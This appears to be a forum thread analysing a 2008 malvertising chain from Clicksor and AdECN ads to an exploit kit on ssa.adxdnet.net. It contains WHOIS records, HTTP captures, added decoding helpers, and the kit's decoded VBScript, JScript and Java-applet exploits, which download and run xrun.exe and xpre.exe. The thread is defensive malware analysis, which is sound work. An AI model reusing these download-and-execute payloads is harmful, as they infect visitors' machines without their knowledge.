Domain servers in listed order:

NS1.MEDIAPLEX.COM 64.158.223.64
NS2.MEDIAPLEX.COM 64.70.10.79

Websites.
  1. Afcyhf.com
  2. Anrdoezrs.net
  3. Awltovhc.com
  4. Dpbolvw.net
  5. Ftjcfx.com
  6. Ipowerwebspecials.com
  7. Jdoqocy.com
  8. Kqzyfj.com
  9. Lduhtrp.net
  10. Qkimg.net
  11. Qksrv.net
  12. Qksz.net
  13. Tkqlhce.com
  14. Tqlkg.com
______________________________

www.yceml.net - 96.17.8.24

Website Title: Commission Junction - Privacy Policy (Internet User Privacy)
ICANN Registrar: NETWORK SOLUTIONS, LLC.
IP Address: 96.17.8.24
IP Location - Massachusetts - Cambridge - Akamai Technologies
Reverse IP: 256 other sites hosted on this server.

Registrant:
Commission Junction
530 East Montectio St.
Santa Barbara, CA 93103
US

Domain Name: YCEML.NET

Administrative Contact, Technical Contact:
ValueClick
30699 Russell Ranch Rd
Ste 250
Westlake Village, CA 91361
US
818-575-4500

Record expires on 07-Apr-2009.
Record created on 07-Apr-2004.
Database last updated on 14-Jun-2008 12:14:00 EDT.

Domain servers in listed order:

NS1.MEDIAPLEX.COM 64.158.223.64
NS2.MEDIAPLEX.COM 64.70.10.79
______________________________

The site where this advertisement / redirect is appearing has been alerted and I really hope that the owner will be able to block these ads from being displayed. I'm extremely disappointed that AdECN hasn’t done anything yet to fix this issue. They have full network captures proving that the redirect is happening through their network.

I highly recommend blocking everything coming from ad.adrefer.net
______________________________

Update

Thanks to the speedy reply of the site owner, DirectaClick has been contacted / alerted also about the issue.
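Added example (not code from the thread): rebuilding the redirect chain from the Referer headers of a sniffer capture, the way the posts above trace the ad back to axill.com and ad2.adecn.com by hand. It splits the capture into request blocks, links each URL to the URL that referred it, walks that back to the root, and summarises which hosts refer traffic to which, which is the input for a "block everything coming from ad.adrefer.net" decision. CAPTURE is a constructed merge of the request headers quoted in this thread (only the GET, Referer and Host lines are kept; the final request to adxbnet.net is constructed with the showmsr page as its referer, as in the earlier capture); the function names are my own.

```python
"""Rebuild an ad redirect chain from Referer headers in a capture.
Added example, not the thread's own code.  CAPTURE is a constructed merge
of the requests quoted in the posts above."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

CAPTURE = """GET http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868 HTTP/1.1
Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468
Host: ad2.adecn.com

GET http://ad.adrefer.net/serve/servemsr?atype=b0&pid=108459 HTTP/1.1
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Host: ad.adrefer.net

GET http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323 HTTP/1.1
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Host: ad.adrefer.net

GET http://www.ikwlkad.net/placeholder-1740304-867821418?atype=b0&pid=108459 HTTP/1.1
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Host: www.ikwlkad.net

GET http://85.17.162.100/banner/moviedownloads.jpg HTTP/1.1
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Host: 85.17.162.100

GET http://www.awofkwy.net/placeholder-1603100-867826860 HTTP/1.1
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Host: www.awofkwy.net

GET http://adxbnet.net/code/smain.php?scout=acxcrds HTTP/1.1
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Host: adxbnet.net
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d$")


def parse_capture(text):
    """Split a capture into request records: {'url': ..., 'headers': {...}}.
    Blocks that do not start with a request line (responses, bodies) are skipped."""
    requests = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = REQUEST_LINE.match(lines[0].strip())
        if not m:
            continue
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append({"url": m.group(2), "headers": headers})
    return requests


def referer_graph(requests):
    """Map each requested URL to the URL that referred it (None if no Referer)."""
    parent = {}
    for r in requests:
        parent.setdefault(r["url"], r["headers"].get("referer"))
    return parent


def chain_to(parent, url, limit=32):
    """Walk Referer links back from url; returns [root, ..., url].
    Stops on a referer loop or after `limit` hops instead of spinning."""
    chain, seen = [url], {url}
    while len(chain) < limit:
        p = parent.get(chain[0])
        if not p or p in seen:
            break
        seen.add(p)
        chain.insert(0, p)
    return chain


def host(url):
    return urlsplit(url).netloc


def chain_hosts(parent, url):
    return [host(u) for u in chain_to(parent, url)]


def children_hosts(parent, url):
    """Hosts loaded directly by the document at url (siblings in the chain)."""
    return sorted({host(u) for u, p in parent.items() if p == url})


def referring_hosts(requests):
    """host -> sorted hosts whose pages referred to it (block-list input)."""
    refs = defaultdict(set)
    for r in requests:
        ref = r["headers"].get("referer")
        if ref:
            refs[host(r["url"])].add(host(ref))
    return {h: sorted(s) for h, s in refs.items()}


if __name__ == "__main__":
    reqs = parse_capture(CAPTURE)
    parent = referer_graph(reqs)
    print(" -> ".join(chain_hosts(parent, "http://adxbnet.net/code/smain.php?scout=acxcrds")))
    for h, sources in referring_hosts(reqs).items():
        print(h, "referred by", sources)
```

Note what the header trail does and does not show: a `<script src>` written into the showmsr document runs in that document, so the iframes it injects carry the showmsr URL as referer, not the placeholder that delivered them. The placeholder hosts (ikwlkad.net, awofkwy.net) therefore appear as siblings under showmsr rather than as links in the chain, which is why the posts pair the referer trail with decoding the page bodies.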
Kimberly
New domain via clicksor & especialads.com - thanks to wagdoll for reporting this.

adxcnet.net - 92.61.62.42

Website Title: None given.
ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-07-14
Expires: 2009-07-14
Updated: 2008-07-14
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 441,416 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

IP Address: 92.61.62.42
IP Location - Austria
Reverse IP: 23 other sites hosted on this server.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxbnet.net
  6. Awofkwy.net
  7. Biserica-emanuel.net
  8. Daemonlinks.info
  9. Ddload.net
  10. Dvden.net
  11. Especialads.com
  12. Iefjios.net
  13. Kasdfps.net
  14. Kiafjwo.net
  15. Netaddirect.com
  16. Netcrefer.net
  17. Netcshow.net
  18. Netsdir.net
  19. Nseek.org
  20. Snipenet.net
  21. Snipernet.biz
  22. Snipernet.us
  23. Snnet.biz
  24. Sxload.net
Kimberly
I ran into them again through Clicksor advertising. Didn't see a trace from especialads.com; it has been replaced by espads.net.

<h4>
Starting point at Clicksor
</h4>
creative2.clicksor.com/network_1/66990/c594447302.html

CODE
<script language="javascript" src="http://espads.net/banner/serve.php?sv=728x90"></script>

CODE
GET http://espads.net/banner/serve.php?sv=728x90 HTTP/1.1
Accept: */*
Referer: http://creative2.clicksor.com/network_1/66990/c594447302.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: espads.net
Proxy-Connection: Keep-Alive

The page contains an encrypted script which, once decoded, gives:

CODE
document.location.href = "http://espads.net/banner/show.php?cid=1153503&tid=6714355977&sv=728x90";

<h4>
espads.net
</h4>
espads.net/banner/show.php?

Again an encrypted script, decoded:

CODE
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=146891.10000037&type=4&subid=0" target="_blank"><IMG alt="Fujitsu Computer Systems Corporation" border="0" src="http://www.fujitsupc.com/www/content/banners/st4000_728x90.jpg"></a><IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=146891.10000037&type=4&subid=0">
<script language="javascript" src="http://www.kasdfps.net/placeholder-1538439-2877584061"></script>
  1. ad.linksynergy.com/fs-bin/show?id=[removed] just points to a gif file.

    CODE
    HTTP/1.1 200 OK
    Date: Thu, 02 Oct 2008 14:53:15 GMT
    Server: Apache/1.3.34 (Unix) mod_perl/1.29
    Expires: Thu, 02 Oct 2008 16:53:15 GMT
    Content-Type: image/gif
    Proxy-connection: close

  2. Banner to be displayed: www.fujitsupc.com/www/content/banners/st4000_728x90.jpg

    IPB Image

  3. Link to www.kasdfps.net
<h4>
www.kasdfps.net
</h4>
CODE
GET http://www.kasdfps.net/placeholder-1538439-2877584061 HTTP/1.1
Accept: */*
Referer: http://espads.net/banner/show.php?cid=1153503&tid=6714355977&sv=728x90
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.kasdfps.net
Proxy-Connection: Keep-Alive

The script once decoded, shows 4 iframes:
CODE
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>
All the pages at ssa.adxdnet.net contain obfuscated scripts. Below is their content once decoded. The remaining Unescape parts have their decoded value added as a comment by me - see the // parts.

ssa.adxdnet.net/code/smain.php?scout=acxcrds

CODE
<script language="VBScript">
on error resume next
Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, aobj, eobj, sobj, tfld, eloc
Set cobj = document.createElement("object")
cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%"+"64%3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")
//"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%"+"6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50"),"")
// "Microsoft.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%"+"4c%32%2e%58%4d%4c%48%54%54%50"),"")
// "MSXML2.XMLHTTP"
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%"+"42%2e%53%74%72%65%61%6d"),"")
// "ADODB.Stream"
Set eobj = cobj.CreateObject(Unescape("%"+"53%68%65%6c%6c%2e%"+"41%70%70%6c%69%63%61%74%69%6f%6e"),"")
// "Shell.Application"
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%69%6e%"+"67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"),"")
// "Scripting.FileSystemObject"
If VarType(xobj) And VarType(aobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.Send
Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target)
If sobj.FileExists(eloc) = False Then
If Len(xobj.responseBody) > 1 And InStr(LCase(xobj.responseText), "<html>") = 0 Then
aobj.type = 1
aobj.open
aobj.write xobj.responseBody
aobj.savetofile eloc, 2
aobj.close
End If
End If
If sobj.FileExists(eloc) Then eobj.ShellExecute eloc, "", "", "open", 0
End If
End Function
Call DownExRdsDsc("http://ssa.adxdnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://ssa.adxdnet.net/xpre.exe", "xpre.exe")
</script>
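The decoding done by hand in the // comments above can be automated. The following Python helper is an added example, not part of the original post and not code from the kit: it finds each split-and-Unescape call, joins the fragments, percent-decodes them and lists the CLSIDs and ProgIDs the script probes. The sample input is constructed from four lines of the decoded scripts.

```python
import re

# Added analyst helper (not from the write-up): decodes the split-and-Unescape
# string hiding used by the ssa.adxdnet.net scripts, e.g.
#   Unescape("%"+"63%6c%73%69%"+"64%3a...")  ->  "clsid:BD96C556-..."
# Handles both the VBScript (Unescape) and JScript (unescape) variants.

# One Unescape(...) call whose argument is one or more double-quoted literals
# joined with '+'. Group 1 captures the whole argument expression.
_CALL_RE = re.compile(r'[Uu]nescape\(\s*("[^"]*"(?:\s*\+\s*"[^"]*")*)\s*\)')
_STR_RE = re.compile(r'"([^"]*)"')
_PCT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text: str) -> str:
    """Decode like JScript unescape()/VBScript Unescape(): every %XX or
    %uXXXX becomes one character, everything else passes through."""
    return _PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_call_args(arg_expr: str) -> str:
    """Join the concatenated literals, then percent-decode the result.
    The fragments only make sense once joined: "%" + "63..." is one escape,
    which is exactly why the author split them that way."""
    return js_unescape("".join(_STR_RE.findall(arg_expr)))


def extract_com_identifiers(script_text: str) -> set[str]:
    """All decoded Unescape() arguments in a script: the CLSIDs and ProgIDs
    the downloader tries, as a quick inventory of what it relies on."""
    return {decode_call_args(m.group(1)) for m in _CALL_RE.finditer(script_text)}


def annotate_script(script_text: str, comment_prefix: str = "//") -> str:
    """Reproduce the write-up's presentation: after each line containing an
    Unescape() call, add a comment line with the decoded value(s)."""
    out = []
    for line in script_text.splitlines():
        out.append(line)
        decoded = [decode_call_args(m.group(1)) for m in _CALL_RE.finditer(line)]
        if decoded:
            out.append(comment_prefix + " " + ", ".join(f'"{d}"' for d in decoded))
    return "\n".join(out)


# Constructed sample: four lines lifted from the decoded scripts above.
SAMPLE_SCRIPT = '''Set cobj = document.createElement("object")
cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%"+"64%3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%"+"42%2e%53%74%72%65%61%6d"),"")
try { var a = new ActiveXObject(unescape("%"+"54%78%"+"43%74%78%2e%54%72%61%6e%73%61%63%74%69%6f%6e%43%6f%6e%74%65%78%74")); }catch(e){}
'''

if __name__ == "__main__":
    print(annotate_script(SAMPLE_SCRIPT))
    print(sorted(extract_com_identifiers(SAMPLE_SCRIPT)))
```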

ssa.adxdnet.net/code/smain.php?scout=acxcobj

CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%3a%"+"42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")); }catch(e){} }  
// "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%"+"69%70%74%2e%53%68%65%6c%6c"),""); }catch(e){} }
//"WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%"+"3a%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36")); }catch(e){} }
// "clsid:AB9BCEDD-EC7E-47E1-9322-D4A210617116"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"54%78%"+"43%74%78%2e%54%72%61%6e%73%61%63%74%69%6f%6e%43%6f%6e%74%65%78%74")); }catch(e){}
// "TxCtx.TransactionContext"
if(a) { try { var b = a.CreateInstance(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"57%4d%49%53%63%72%69%70%"+"74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32")); }catch(e){}
// "WMIScriptUtils.WMIObjectBroker2"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e")); }catch(e){}
// "Outlook.Application"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false;
try { var a = new ActiveXObject(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){}
// "WScript.Shell"
if(a) { try { a.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, aobj, eloc

if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"4f%75%74%"+"6c%6f%6f%6b%2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
// "Outlook.Application"
if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"57%4d%49%53%63%72%"+"69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32"))
// "WMIScriptUtils.WMIObjectBroker2"

Set wobj = cobj.CreateObject(Unescape("%"+"57%63%"+"72%69%70%74%2e%53%68%65%6c%6c"))
// "Wcript.Shell"
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%"+"69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))
// "Scripting.FileSystemObject"
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%42%2e%"+"53%74%72%65%61%6d"))
// "ADODB.Stream"

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%6f%"+"73%6f%66%74%2e%58%4d%4c%48%54%54%50"))
// "Microsoft.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%"+"58%4d%4c%32%2e%58%4d%4c%48%54%54%50"))
// "MSXML2.XMLHTTP"

eloc = sobj.GetSpecialFolder(2) & Chr(92) & target

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.Send: response = xobj.ResponseBody
   aobj.Type = 1: aobj.Mode = 3: aobj.Open
   aobj.Write response
   aobj.SaveToFile eloc, 2
   aobj.Close
End If

wobj.run eloc, 0
End Function

Call DownExAxObj("http://ssa.adxdnet.net/xrun.exe", "xrun.exe")
Call DownExAxObj("http://ssa.adxdnet.net/xpre.exe", "xpre.exe")

</script>

ssa.adxdnet.net/code/smain.php?scout=jvcxeng

CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>
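The version gates in the jvcxeng script above are JScript comparisons with coercion quirks (the string parts are compared as numbers, and `06` is an octal literal equal to 6). The Python helper below is an added example, not part of the original post, that spells those gates out so you can confirm which of them, if any, a given Java build would pass; the version strings used are constructed examples.

```python
import re

# Added helper (not from the write-up): evaluates the four version gates of the
# non-IE branch of the jvcxeng script (the branch that needs no clientCaps
# lookup) against a Java version string such as "1.5.0_09".

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?")


def parse_java_version(version: str):
    """Split "1.5.0_09" into (1, 5, 0, 9) the way jvjs.split(".") and
    jvjs[2].split("_") do. The update number is None when absent."""
    m = _VERSION_RE.match(version)
    if not m:
        return None  # the script's split(".") would throw or yield junk here
    major, minor, micro, update = m.groups()
    return int(major), int(minor), int(micro), (int(update) if update else None)


def _lt(value, limit):
    """JS-style comparison: undefined < n is always false."""
    return value is not None and value < limit


def java_gates(version: str) -> dict:
    """Which of the script's flags (sjmsjvm, sjsecmn, sjusafe, sjiproc) a
    build sets. Each JS condition is transcribed with numeric comparisons,
    which is what JScript does when one side is a number literal."""
    parsed = parse_java_version(version)
    if parsed is None:
        return {"msjvm": False, "secman": False, "unsafe": False, "impro": False}
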